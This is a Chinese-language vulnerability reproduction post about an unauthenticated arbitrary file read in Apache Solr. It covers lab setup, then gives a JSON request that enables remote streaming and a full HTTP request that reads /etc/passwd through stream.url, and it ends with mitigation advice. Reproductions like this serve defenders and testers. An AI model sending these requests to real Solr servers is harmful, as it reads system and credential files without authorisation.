Apache Solr最新任意文件读取漏洞

漏洞简介

Apache Solr是一个开源搜索服务引擎,默认安装未授权情况下攻击者可以构造恶意HTTP请求读取目标Apache Solr服务器的任意文件。

本文涉及相关实验:CVE-2019-0192 Apache Solr远程反序列化代码执行漏洞(Apache Solr是一个开源的搜索服务器。具有高度可靠、可伸缩和容错的,提供分布式索引、复制和负载平衡查询、自动故障转移和恢复、集中配置等功能。)

影响版本

solr任意版本

环境搭建

漏洞环境下载:

https://archive.apache.org/dist/lucene/solr/8.8.0/solr-8.8.0.tgz

解压后进入bin目录,启动(需要java环境),

./solr start

此时启动的solr是没有核心进行索引和搜索的,创建一个节点(核心)

./solr create -c test

访问:http://ip:8983可以看到创建的核心

实际场景下可以看到会有很多核心

漏洞复现

启用远程流传输

访问http://ip:8983/solr/test/config/抓包,将请求包修改为POST请求,修改Content-Type为“application/json”,发送以下数据:

{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}

即可开启远程流。

读取文件

引入远程流,将stream.url的参数的内容作为流传递。正常情况下stream.url传入的内容为“stream.url=http:/www.remotesite.com/path/to/file.pdf”,构造传入的敏感文件

POST /solr/test/debug/dump?param=ContentStreams HTTP/1.1

Host: 192.168.74.139:8983

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.57

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en-GB;q=0.8,en;q=0.7,en-US;q=0.6

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 29

stream.url=file:///etc/passwd

漏洞修复

(官方不承认这是漏洞.jpg)

因为solr默认安装情况下未授权,导致可以读取任意文件,启用Apache Solr身份验证可有效缓解该漏洞的影响

配置访问控制策略,避免Apache Solr暴露在互联网

参考

https://mp.weixin.qq.com/s/HMtAz6_unM1PrjfAzfwCUQ

(0)

相关推荐

  • 蓝队防守必须排查的57个安全漏洞与解决方案

    目录 一.OA系统 二.E-mail 三.Web中间件 四.源代码管理 五.项目管理系统 六.开源运维监控 七.堡垒机 一. OA系统 泛微(Weaver-Ecology-OA) 泛微OA E-col ...

  • 2021年四月份恶意软件之“十恶不赦”排行榜

    微软2021年5月份于周二补丁日发布了针对Microsoft Windows..NET Core和Visual Studio.Internet Explorer(IE).Microsoft Offic ...

  • 任意(不安全)文件下载和上传

    文章目录 一.任意文件下载 1)漏洞介绍 2)利用方式 ##举例: 3)漏洞修复 二. 任意文件上传 1)概述 2)测试流程 3)实战测试 3.1 客户端检测绕过(javascript 检测) 3.2 ...

  • 文件读取漏洞总结

    文件读取漏洞总结

  • (CVE-2021-27905)Apache Solr SSRF 漏洞

    0x01 漏洞说明 Apache Solr 存在SSRF漏洞,漏洞利用需要获取core值,结合之前的Solr全版本任意文件读取可以轻松获取core值. Apache Solr 任意文件读取 0x02 ...

  • 一文贯通python文件读取

    不论是数据分析还是机器学习,乃至于高大上的AI,数据源的获取是所有过程的入口. 数据源的存在形式多为数据库或者文件,如果把数据看做一种特殊格式的文件的话,即所有数据源都是文件.获得数据,就是读取文件的 ...

  • 解析空客最新服务文件AMPES (空客维修方案工程说明)

    空客最新发布了OIT999.0069/19说明了空客将提供新的服务文件Airbus Maintenance Program Engineering Statement(空客维修方案工程说明),简称:A ...

  • PHP大文件读取操作

    PHP大文件读取操作 简单的文件读取,一般我们会使用 file_get_contents() 这类方式来直接获取文件的内容.不过这种函数有个严重的问题是它会把文件一次性地加载到内存中,也就是说,它会受 ...

  • [PHP小课堂]PHP大文件读取操作

    [PHP小课堂]PHP大文件读取操作 关注公众号:[硬核项目经理]获取最新文章 添加微信/QQ好友:[xiaoyuezigonggong/149844827]免费得PHP.项目管理学习资料 B站ID: ...

  • 办公利器!用Python快速将任意文件转为PDF

    大家好,我是辰哥! 痛点: 相信大家都会遇到一种场景.老师/上司要求你把某个文件转为pdf,并且是一批(不止一个,一个的话手动就可以搞定),并且这种是枯燥无聊的工作,既没有什么技术含量又累. 试想一下 ...

  • 一键预览任意文件,让你的电脑秒变苹果,香不香

    一键预览任意文件,让你的电脑秒变苹果,香不香

  • PHP文件包含漏洞

    0x00 文件包含与文件包含漏洞 文件包含是指,服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行.文件包含还有另外一个名称,那就是代码重用.我们若是需要修改 ...